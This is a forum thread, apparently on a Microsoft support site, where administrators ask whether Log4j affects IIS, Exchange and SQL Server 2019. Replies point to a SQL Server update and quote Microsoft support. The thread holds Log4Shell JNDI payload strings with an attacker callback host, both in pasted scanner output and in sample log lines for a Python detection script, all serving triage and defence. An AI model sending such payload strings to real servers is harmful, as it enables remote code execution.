The latest patch CU16 has the solution to this issue.
KB5011644 - Cumulative Update 16 for SQL Server 2019
14669019
"Removes log4j2 used by SQL Server 2019 Integration Services (SSIS) to avoid any potential security issues."
Hi Team,
As there is a Log4J vulnerability trending recently, may I get clarification on the points below?
1) How is the Log4J vulnerability impacting my Windows hosts?
2) How can I prevent or take precautions against being affected by Log4J?
3) Has Microsoft released any patches for mitigating this vulnerability?
4) Does it affect any other applications released by Microsoft, like MSSQL, SCCM or IIS etc.?
Kindly provide the updates on this.
Hello @ABDUL SAHAD
You can find Microsoft's official guide and statements here:
Hope this helps with your query,
-----------
--If the reply is helpful, please Upvote and Accept as answer--
We are seeing this in Windows Servers that run Remote Web Access or even Exchange Servers OWA; the Jar stuff is in there, it's old, it's being flagged as vulnerabilities, and attempts are being made to exploit it - as per our Datto RMM. We have only installed MS IIS, RWA, OWA etc., no other 3rd party web server tools, so it seems to us that Microsoft application servers are using the L4j in Inetpub logging.
Example:
SUSP_JDNIExploit_Indicators_Dec21 C:\inetpub\logs\LogFiles\W3SVC1\u_ex211210.log
0x1710:$xr1: ldap://45.155.205.233:12344/Basic/Command/Base64/
0x1829:$xr1: ldap://45.155.205.233:12344/Basic/Command/Base64/
0x1c1a:$xr1: ldap://45.155.205.233:12344/Basic/Command/Base64/
0x1d33:$xr1: ldap://45.155.205.233:12344/Basic/Command/Base64/
Through a support case with Microsoft, their response is as follows:
"Anyone at all that has an Internet-facing server is getting scanned since this became public. Seeing attempts in the IIS logs doesn’t necessarily indicate a compromise. It could just mean that someone is looking to fingerprint your machine to see if it is vulnerable.
The vulnerability is in an Open Source Java logging library so unless you added a 3rd party application that uses Log4J2 it is unlikely that you are vulnerable to this exploit.
It may be worth looking into a 3rd party vulnerability scanner to help determine if your systems are vulnerable."
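Added example, not part of the original thread or of any Microsoft tooling: a triage pass over IIS W3C log lines that lists requests carrying a JNDI lookup string like the ones flagged above, with the sending client and the status IIS returned. The log lines, addresses and function names are constructed for illustration; the column order is read from the log's own `#Fields` header.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-12-10 08:01:12 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 198.51.100.7 Mozilla/5.0 - 200 0 0 31
2021-12-10 08:02:40 10.0.0.5 GET / - 443 - 203.0.113.9 ${jndi:ldap://203.0.113.9:12344/a} - 404 0 2 15
2021-12-10 08:03:05 10.0.0.5 GET /remote q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A12344%2Fb%7D 443 - 203.0.113.20 Mozilla/5.0 - 302 0 0 12
"""

# Indicator: a JNDI lookup that names a remote LDAP/RMI/DNS endpoint.
JNDI_RE = re.compile(r"jndi:(ldaps?|rmi|dns)://([^/\s}]+)", re.IGNORECASE)

def find_jndi_requests(log_text):
    """Return one dict per logged request that carries a JNDI lookup string."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]           # column names for the rows below
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        for name, value in row.items():
            m = JNDI_RE.search(unquote(value))  # values may be URL-encoded
            if m:
                hits.append({
                    "when": f"{row.get('date')} {row.get('time')}",
                    "client": row.get("c-ip"),
                    "field": name,              # where the string was placed
                    "callback": m.group(2),     # host:port named in the lookup
                    "status": row.get("sc-status"),
                })
                break                           # one hit per request is enough
    return hits

def summarize(hits):
    """Group hits by sending client so repeat scanners stand out."""
    by_client = {}
    for h in hits:
        by_client.setdefault(h["client"], []).append(h)
    return by_client

if __name__ == "__main__":
    for hit in find_jndi_requests(SAMPLE_LOG):
        print(hit)
```

Each hit is a request that IIS received and wrote to its log; the status column shows how IIS answered it, not whether any Log4j component ever processed the string.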
Can confirm we are seeing the old version of Log4J in our SQL Server 2019 Standard DTS folder as well. Wondering what the best upgrade path would be, can it be deleted or just replaced?
ERottier is correct. SQL put it there when installing SQL 2019 Ent. I'm assuming it's for the Java check box when installing SQL 2019? Anyway, can this be safely removed from the directory? In fact, can the whole JARS folder be removed?